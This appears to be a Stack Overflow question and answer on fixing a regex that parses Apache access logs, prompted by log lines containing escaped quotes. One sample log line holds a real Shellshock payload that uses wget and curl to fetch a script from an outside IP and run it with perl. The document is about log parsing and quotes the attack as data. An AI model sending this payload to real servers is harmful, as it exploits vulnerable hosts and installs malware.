Charlie

Reputation: 138

Regexp to parse apache2 log, handle SHELLSHOCK bash hack

I want to parse Apache2 log files and found an otherwise good regexp for the job:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/

The problem is that this regexp predates Shellshock hack bots: it returns no match for a log line whose user-agent string looks like the one below.

Example of a bash (Shellshock) attack line:

199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""

Here is a regular log line:

157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

Can someone provide an updated regexp that handles hacked user-agent strings, or suggest an alternative two-step PHP/regexp approach that is more hack-proof? I can see the specific problem is the handling of \", and it appears the last group can be replaced with "(.*)"$, but I'd like an expert opinion... Thanks.
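To see the failure and the proposed "(.*)"$ tweak side by side, here is a minimal sketch using Python's `re` module. This is an assumption: the question targets PHP, but the pattern only uses constructs that PCRE and Python treat the same way. The names HEAD, ORIGINAL and GREEDY_TAIL are hypothetical.

```python
import re

# Question's pattern minus its last group (the /.../ delimiters are dropped).
HEAD = (r'^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] '
        r'\"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" ')
ORIGINAL = re.compile(HEAD + r'"([^"]*)"$')   # the question's regexp as posted
GREEDY_TAIL = re.compile(HEAD + r'"(.*)"$')   # last group replaced by "(.*)"$

# The Shellshock line from the question.
SHELLSHOCK = (
    '199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" '
    '404 498 "-" "() { :;}; /bin/bash -c \\"cd /tmp;wget http://185.28.190.69/mc;'
    'curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\\""'
)

print(ORIGINAL.match(SHELLSHOCK))  # None: [^"]* stops at the first \"
m = GREEDY_TAIL.match(SHELLSHOCK)
print(m.group(13))                 # whole user agent, escaped quotes included
```

The greedy tail only works because the user agent is the last field on the line; it would also accept unescaped quotes, so an escape-aware pattern is the more careful fix.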

Upvotes: 0

Views: 499

Answers (1)

rici

Reputation: 241911

Change both instances of

"([^"]*)"

to

"((?:[^"]|\\")*)"

That will allow \" within quoted strings.
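A minimal Python sketch (Python's `re` standing in for PCRE, an assumption) that checks the answer's quoted-field pattern against the user-agent field from the question. For comparison it also shows a common unambiguous variant, [^"\\]|\\., which is not part of the answer; the names ANSWER_QUOTED and STRICT_QUOTED are hypothetical.

```python
import re

# Answer's pattern: each character is a non-quote, or a backslash followed by a quote.
ANSWER_QUOTED = re.compile(r'"((?:[^"]|\\")*)"')
# Common alternative (not from the answer): a character that is neither quote
# nor backslash, or a backslash followed by any single character.
STRICT_QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')

# User-agent field of the Shellshock line, including its surrounding quotes.
ua_field = ('"() { :;}; /bin/bash -c \\"cd /tmp;wget http://185.28.190.69/mc;'
            'curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\\""')

a = ANSWER_QUOTED.fullmatch(ua_field)
b = STRICT_QUOTED.fullmatch(ua_field)
print(a.group(1) == b.group(1))  # True
```

Both capture the same text here. With the answer's version the engine first lets [^"] consume the backslash and only backtracks to \\" when the next quote fails to end the field; in the stricter variant each backslash can be consumed in only one way.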

By the way, it is not necessary to backslash-escape quotes in a regex, nor is it necessary to backslash-escape ] in a character class when it is the first character in the class (right after the ^ in a negated class). So you could remove some redundant backslashes. Personally, I'd also use the same quote-exclusion syntax instead of the non-greedy (.*?) match for the request.
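A quick way to confirm that those backslashes are redundant is to compile the timestamp-and-method part of the pattern both ways and compare the captures. This is a sketch in Python's `re` (an assumption; PCRE behaves the same for these constructs), and the sample text is taken from the question's log lines. Note that the trick does not carry over to JavaScript, where [^] means "any character".

```python
import re

stamp = '[18/Jan/2015:04:51:19 -0500] "GET / HTTP/1.1"'

# Escaped forms, as written in the question's regexp.
escaped = re.compile(r'\[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+)')
# Same pattern without the redundant backslashes: "]" right after "[^" is a
# literal, and a double quote needs no escaping inside the regex itself.
unescaped = re.compile(r'\[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)')

print(escaped.match(stamp).groups() == unescaped.match(stamp).groups())  # True
```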

Finally, as noted in a comment, parsing the request fails when the request line is incomplete. If the only kind of incomplete request line is the missing-request indicator ("-"), you can recognize it by making everything after the method optional, so that the - is captured as the "method".

So I'd suggest the following:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$/
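A minimal sketch of that suggested pattern in use, assuming Python's `re` as a stand-in for PHP's preg functions. The field names and parse_line are hypothetical, and the DASH line is made up to exercise the optional request part; the other two lines come from the question.

```python
import re

# Pattern suggested above, /.../ delimiters removed.
LOG_RE = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] '
    r'"(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) '
    r'"((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$'
)

# Hypothetical names, one per capture group (13 in total).
FIELDS = ("host", "ident", "user", "date", "time", "tz", "method", "path",
          "protocol", "status", "bytes", "referer", "agent")


def parse_line(line):
    """Return a dict of named fields, or None if the line does not match."""
    m = LOG_RE.match(line)
    return dict(zip(FIELDS, m.groups())) if m else None


SHELLSHOCK = (
    '199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" '
    '404 498 "-" "() { :;}; /bin/bash -c \\"cd /tmp;wget http://185.28.190.69/mc;'
    'curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\\""'
)
REGULAR = (
    '157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" '
    '"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"'
)
# Made-up line whose request field is only the "-" indicator.
DASH = '127.0.0.1 - - [18/Jan/2015:10:00:00 -0500] "-" 408 0 "-" "-"'

for line in (SHELLSHOCK, REGULAR, DASH):
    fields = parse_line(line)
    print(fields["method"], fields["path"], fields["status"])
```

For the DASH line the optional group does not participate, so path and protocol come back as None rather than as empty strings.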

Upvotes: 0
